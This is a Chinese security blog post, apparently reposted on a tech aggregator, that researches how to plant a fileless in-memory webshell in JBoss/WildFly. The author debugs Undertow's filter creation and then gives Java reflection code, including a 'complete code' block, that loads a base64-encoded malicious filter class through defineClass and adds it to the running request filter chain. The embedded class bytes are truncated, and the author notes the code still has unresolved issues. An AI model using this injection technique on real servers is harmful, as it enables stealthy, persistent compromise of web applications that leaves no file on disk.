IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 开发工具 -> JBoss无文件webshell研究 -> 正文阅读

[开发工具]JBoss无文件webshell研究

JBoss无文件webshell研究

前言

在网上并没有怎么找到JBoss无文件shell的资料,只找到了宽字节的一篇,其中遇到了很多问题,不过还好自己也后来解决了,发现自己遇到了很多白痴问题,感觉自己好笨。。。

环境

  • IDEA 2021.3
  • wildfly-20.0.0.Final

分析

如何生成Filter

先在IDEA中部署一个JBoss项目,然后在Filter中先断点,同时使用debug启动,来观察一下。


我们可以看见有个MangerFilter#createFilter函数,我们跟进

public void createFilter() throws ServletException {
        synchronized(this) {
            if (this.filter == null) {
                try {
                    this.handle = this.filterInfo.getInstanceFactory().createInstance();
                } catch (Exception var4) {
                    throw UndertowServletMessages.MESSAGES.couldNotInstantiateComponent(this.filterInfo.getName(), var4);
                }

                Filter filter = (Filter)this.handle.getInstance();
                (new LifecyleInterceptorInvocation(this.servletContext.getDeployment().getDeploymentInfo().getLifecycleInterceptors(), this.filterInfo, filter, new FilterConfigImpl(this.filterInfo, this.servletContext))).proceed();
                this.filter = filter;
            }

        }
    }

在MangerFilter#createFilter中如果Filter不存在那么就会调用LifecyleInterceptorInvocation来生成filter,其中使用到了两个参数:this.servletContext,this.filterInfo,所以如果要通过反射生成Filter我们需要传入这两个参数

如何获取filterInfo和servletContext

在MangerFilter中跟入filterInfo,观察filterInfo初始化需要name及filter的名称,然后一个filterClass

综上所述,我们需要通过反射的生成filterInfo的代码如下

 Object evilFilterInfo = Class.forName("io.undertow.servlet.api.FilterInfo").getDeclaredConstructors()[0].newInstance("FilterTest", evilFilterClass);

对于其中的evilFilterClass又如何生成?我们只需要自己写一个Filter然后生成class文件,进行读取并进行base64加密即可,然后通过反射调用defineClass生成一个evilFilterClass

BASE64Decoder b64Decoder = new sun.misc.BASE64Decoder();
String codeClass = "yv66vgAA....";
Method defineClassM = Thread.currentThread().getContextClassLoader().getClass().getSuperclass().getSuperclass().getSuperclass().getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
defineClassM.setAccessible(true);
evilFilterClass = (Class) defineClassM.invoke(Thread.currentThread().getContextClassLoader(), b64Decoder.decodeBuffer(codeClass), 0, b64Decoder.decodeBuffer(codeClass).length);      

而defineClass为什么这么写的原因只需要自己通过IDEA观察一下就可以明白

而我们需要获取servletContext我们跟入

然后查找哪些地方使用了ServletContext,在ServletRequest中调用到了,而对于

现在很简单了,我们主要想办法获取ServletRequestContext就可以,而在其中存在getCurrentServlet的方法可以获取

现在步骤清晰了,这里已经可以生成一个Filter了接下来我们需要做的就是获取内存中的filters,然后加入其中

将生成的filter加入到内存中

很巧的是我们刚刚获取的currrentServlet,就是ServletChain


那么我们获取得到filters然后加入就完成了

Method getCurrentServletM = curContext.getClass().getMethod("getCurrentServlet");
Object servletChain = getCurrentServletM.invoke(curContext);
Field filtersF = servletChain.getClass().getDeclaredField("filters");

filtersF.setAccessible(true);
java.util.EnumMap filters = (EnumMap) filtersF.get(servletChain);

ArrayList filterList = (ArrayList) filters.get(DispatcherType.REQUEST);
filterList.add(evilManagedFilter);

解决问题

filterArrayList为null

现在证实一下内存马是否成功,但是却失败了,报错显示的是空指针异常,

但是为什么会报错,为也没想明白,就尝试看看各个阶段的一些关键参数的值

可以看见filterList为null,
当时我对着屏幕发了好久的呆,然后后来突然想到了arraylist为null时不能成功的加入,因此进行尝试,这是因为在当前页面filter是空的,我们只要自己先把filter写进来就可以添加了

现在成功加入了

验证

完整代码:

	Method currentM = null;
        currentM = Class.forName("io.undertow.servlet.handlers.ServletRequestContext").getDeclaredMethod("current");
        Object curContext = currentM.invoke(null);

        Method getCurrentServletM = curContext.getClass().getMethod("getCurrentServlet");
        Object servletChain = getCurrentServletM.invoke(curContext);

        Field filtersF = servletChain.getClass().getDeclaredField("filters");
        filtersF.setAccessible(true);
        java.util.EnumMap filters = (EnumMap) filtersF.get(servletChain);

        String evilFilterClassName = "FilterTest";
        Class evilFilterClass = null;

        try {
            evilFilterClass = Class.forName(evilFilterClassName);
        } catch (ClassNotFoundException e) {
            BASE64Decoder b64Decoder = new sun.misc.BASE64Decoder();
            String codeClass = "yv66vgA";
Method defineClassM = Thread.currentThread().getContextClassLoader().getClass().getSuperclass().getSuperclass().getSuperclass().getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
            defineClassM.setAccessible(true);
            evilFilterClass = (Class) defineClassM.invoke(Thread.currentThread().getContextClassLoader(), b64Decoder.decodeBuffer(codeClass), 0, b64Decoder.decodeBuffer(codeClass).length);
        }

        ArrayList filterList = (ArrayList) filters.get(DispatcherType.REQUEST);
        Object evilFilterInfo = Class.forName("io.undertow.servlet.api.FilterInfo").getDeclaredConstructors()[0].newInstance("FilterTest", evilFilterClass);

        Field servletRequestF = curContext.getClass().getDeclaredField("servletRequest");
        servletRequestF.setAccessible(true);
        Object obj = servletRequestF.get(curContext);

        Field servletContextF = obj.getClass().getDeclaredField("servletContext");
        servletContextF.setAccessible(true);
        Object servletContext = servletContextF.get(obj);

        Object evilManagedFilter = Class.forName("io.undertow.servlet.core.ManagedFilter").getDeclaredConstructors()[0].newInstance(evilFilterInfo, servletContext);
        filterList.add(evilManagedFilter);

总结

其实这个代码还是有些问题,还没有解决。。。。。

参考链接

宽字节安全-JBoss无文件webshe
ll

多个Filter的执行顺序

  开发工具 最新文章
Postman接口测试之Mock快速入门
ASCII码空格替换查表_最全ASCII码对照表0-2
如何使用 ssh 建立 socks 代理
Typora配合PicGo阿里云图床配置
SoapUI、Jmeter、Postman三种接口测试工具的
github用相对路径显示图片_GitHub 中 readm
Windows编译g2o及其g2o viewer
解决jupyter notebook无法连接/ jupyter连接
Git恢复到之前版本
VScode常用快捷键
上一篇文章      下一篇文章      查看所有文章
加:2021-08-27 12:04:28  更:2021-08-27 12:05:28 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/22 23:54:46-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码
数据统计